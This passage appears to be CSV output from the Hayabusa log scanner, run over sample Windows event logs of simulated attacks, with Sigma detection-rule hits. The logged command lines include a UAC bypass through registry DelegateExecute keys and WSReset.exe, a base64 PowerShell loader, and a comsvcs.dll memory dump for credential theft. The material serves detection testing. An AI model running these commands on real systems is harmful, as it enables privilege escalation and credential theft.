(Empty) | Process: C:\Windows\system32\reg.exe | PID: 1768 | PGUID: 747F3D96-B07F-5D46-0000-001031A90F04,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:31.476 +09:00,MSEDGEWIN10,13,high,PrivEsc | Evas,Bypass UAC Using DelegateExecute,,rules/sigma/registry_event/win_re_bypass_uac_using_delegateexecute.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:31.485 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 2444 | PGUID: 747F3D96-B07F-5D46-0000-0010F1B20F04",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:31.609 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\(Default): C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 2444 | PGUID: 747F3D96-B07F-5D46-0000-0010F1B20F04,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:31.949 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WSReset.exe"" | Process: C:\Windows\System32\WSReset.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 56 | LID: 0x18d3fb | PID: 200 | PGUID: 
747F3D96-B07F-5D46-0000-001050C80F04",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:32.001 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 312 000002806444CB40 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3952 | PGUID: 747F3D96-B07F-5D46-0000-0010C1CB0F04,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WSReset.exe"" | Process: C:\Windows\System32\WSReset.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 56 | LID: 0x18d3b3 | PID: 2112 | PGUID: 747F3D96-B080-5D46-0000-0010D4EA0F04",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass WSReset,,rules/sigma/process_creation/proc_creation_win_uac_bypass_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\WSReset.exe"" | LID: 0x18d3b3 | PID: 820 | PGUID: 747F3D96-B091-5D46-0000-001081F71104",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,PrivEsc | Evas,Wsreset UAC Bypass,,rules/sigma/process_creation/proc_creation_win_wsreset_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 
2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,PrivEsc,Bypass UAC via WSReset.exe,,rules/sigma/process_creation/proc_creation_win_uac_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:50.455 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe | LID: 0x18d3b3 | PID: 7792 | PGUID: 747F3D96-B092-5D46-0000-001089041204",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:55.299 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 1960 | PGUID: 747F3D96-B097-5D46-0000-0010E1321204",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:55.441 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\(Default): C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 1960 | PGUID: 747F3D96-B097-5D46-0000-0010E1321204,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:55.446 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add 
HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d ""{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 3444 | PGUID: 747F3D96-B097-5D46-0000-0010E7381204",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:55.643 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\DelegateExecute: {4ED3A719-CEA8-4BD9-910D-E252F997AFC2} | Process: C:\Windows\system32\reg.exe | PID: 3444 | PGUID: 747F3D96-B097-5D46-0000-0010E7381204,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:55.712 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7588 | PGUID: 747F3D96-B07D-5D46-0000-00103C8C0F04,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,info,,Logon Type 9 - NewCredentials,User: IEUser | Computer: - | IP Addr: ::1 | LID: 0x38f87e | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx 2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx 2019-08-05 18:39:30.697 
+09:00,MSEDGEWIN10,4624,high,LatMov,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx 2019-08-14 20:53:29.688 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\explorer.exe"" shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x29126 | PID: 1052 | PGUID: 747F3D96-F639-5D53-0000-001067DA2600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx 2019-08-14 20:53:30.010 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x29126 | PID: 6000 | PGUID: 747F3D96-F639-5D53-0000-001092EE2600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx 2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))"""""" | Process: C:\Windows\System32\wscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | LID: 0x29126 | PID: 8180 | PGUID: 747F3D96-F639-5D53-0000-0010B0FC2600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx 2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Script Execution From Temp 
Folder,,rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx 2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx 2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx 2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx 2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x29126 | PID: 2476 | PGUID: 747F3D96-FBCA-5D53-0000-0010B8664100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx 2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx 2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX 
([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))"""""" | Process: C:\Windows\System32\wscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} | LID: 0x29126 | PID: 2876 | PGUID: 747F3D96-FBCA-5D53-0000-001036784100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx 2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx 2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx 2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx 2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx 2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx 2019-08-14 
21:48:15.921 +09:00,MSEDGEWIN10,4703,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx 2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cscript c:\ProgramData\memdump.vbs notepad.exe | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\cmd.exe | LID: 0xe81e5 | PID: 2576 | PGUID: 747F3D96-1C6F-5D69-0000-0010323C1F00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx 2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,high,Exec,WScript or CScript Dropper,,rules/sigma/process_creation/proc_creation_win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx 2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx 2019-08-30 21:54:08.257 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious WMI module load | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Windows\System32\cscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2576 | PGUID: 747F3D96-1C6F-5D69-0000-0010323C1F00 | Hash: SHA1=2E6A63BC5189CA5DF3E85CDF58593F3DF3935DE6,MD5=A081AAD3A296EB414CB6839B744C67C9,SHA256=3D77E7769CFC8B4A1098E9A1F2BDE4432A6A70253EA6C2A58C8F8403A9038288,IMPHASH=0D31E6D27B954AD879CB4DF742982F1A",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx 2019-08-30 21:54:08.257 +09:00,MSEDGEWIN10,7,info,Exec,WMI Modules 
Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx 2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0xe81e5 | PID: 2888 | PGUID: 747F3D96-1C70-5D69-0000-0010C9661F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx 2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx 2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,high,Evas | CredAccess,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/proc_creation_win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx 2019-08-30 21:54:08.396 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\notepad.bin | Process: C:\Windows\system32\rundll32.exe | PID: 2888 | PGUID: 747F3D96-1C70-5D69-0000-0010C9661F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx 2019-08-30 21:54:08.439 +09:00,MSEDGEWIN10,10,high,,Process Access_Sysmon Alert,CredAccess - Memdump | Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2888 | Src PGUID: 747F3D96-1C70-5D69-0000-0010C9661F00 | Tgt PID: 4868 | Tgt PGUID: 
747F3D96-1C5C-5D69-0000-0010FEB71E00,rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx 2019-09-01 20:54:22.450 +09:00,MSEDGEWIN10,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/spoolsample_5145.evtx 2019-09-01 21:04:22.033 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:445 (MSEDGEWIN10) | Dst: 10.0.2.17:59767 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-98DD-5D69-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smb_bi_auth_conn_spoolsample.evtx 2019-09-01 21:04:22.908 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:62733 (MSEDGEWIN10) | Dst: 10.0.2.17:445 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-98DD-5D69-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smb_bi_auth_conn_spoolsample.evtx 2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49947 (MSEDGEWIN10) | Dst: 127.0.0.1:3389 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 3008 | PGUID: 747F3D96-48A4-5D6E-0000-001072958000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,high,LatMov,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 
127.0.0.1:3389 (MSEDGEWIN10) | Dst: 127.0.0.1:49947 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 8 | PGUID: 747F3D96-9874-5D6E-0000-0010C1C20000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:04:56.358 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49948 (MSEDGEWIN10) | Dst: 127.0.0.1:3389 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 3008 | PGUID: 747F3D96-48A4-5D6E-0000-001072958000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:04:56.358 +09:00,MSEDGEWIN10,3,high,LatMov,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:04:58.463 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:3389 (MSEDGEWIN10) | Dst: 127.0.0.1:49948 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 8 | PGUID: 747F3D96-9874-5D6E-0000-0010C1C20000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:05:22.837 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.2.15:137 (MSEDGEWIN10) | Dst: 10.255.255.255:137 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:05:22.837 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.255.255.255:137 () 
| Dst: 10.0.2.15:137 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:33:24.177 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49949 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 8892 | PGUID: 747F3D96-4F81-5D6E-0000-001001818B00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:33:24.177 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (MSEDGEWIN10) | Dst: 127.0.0.1:49949 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:34:37.129 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49950 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 8892 | PGUID: 747F3D96-4F81-5D6E-0000-001001818B00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:34:37.129 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (MSEDGEWIN10) | Dst: 127.0.0.1:49950 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 
2019-09-03 20:36:26.005 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.2.15:137 (MSEDGEWIN10) | Dst: 10.255.255.255:137 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
2019-09-03 20:36:26.005 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.255.255.255:137 () | Dst: 10.0.2.15:137 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
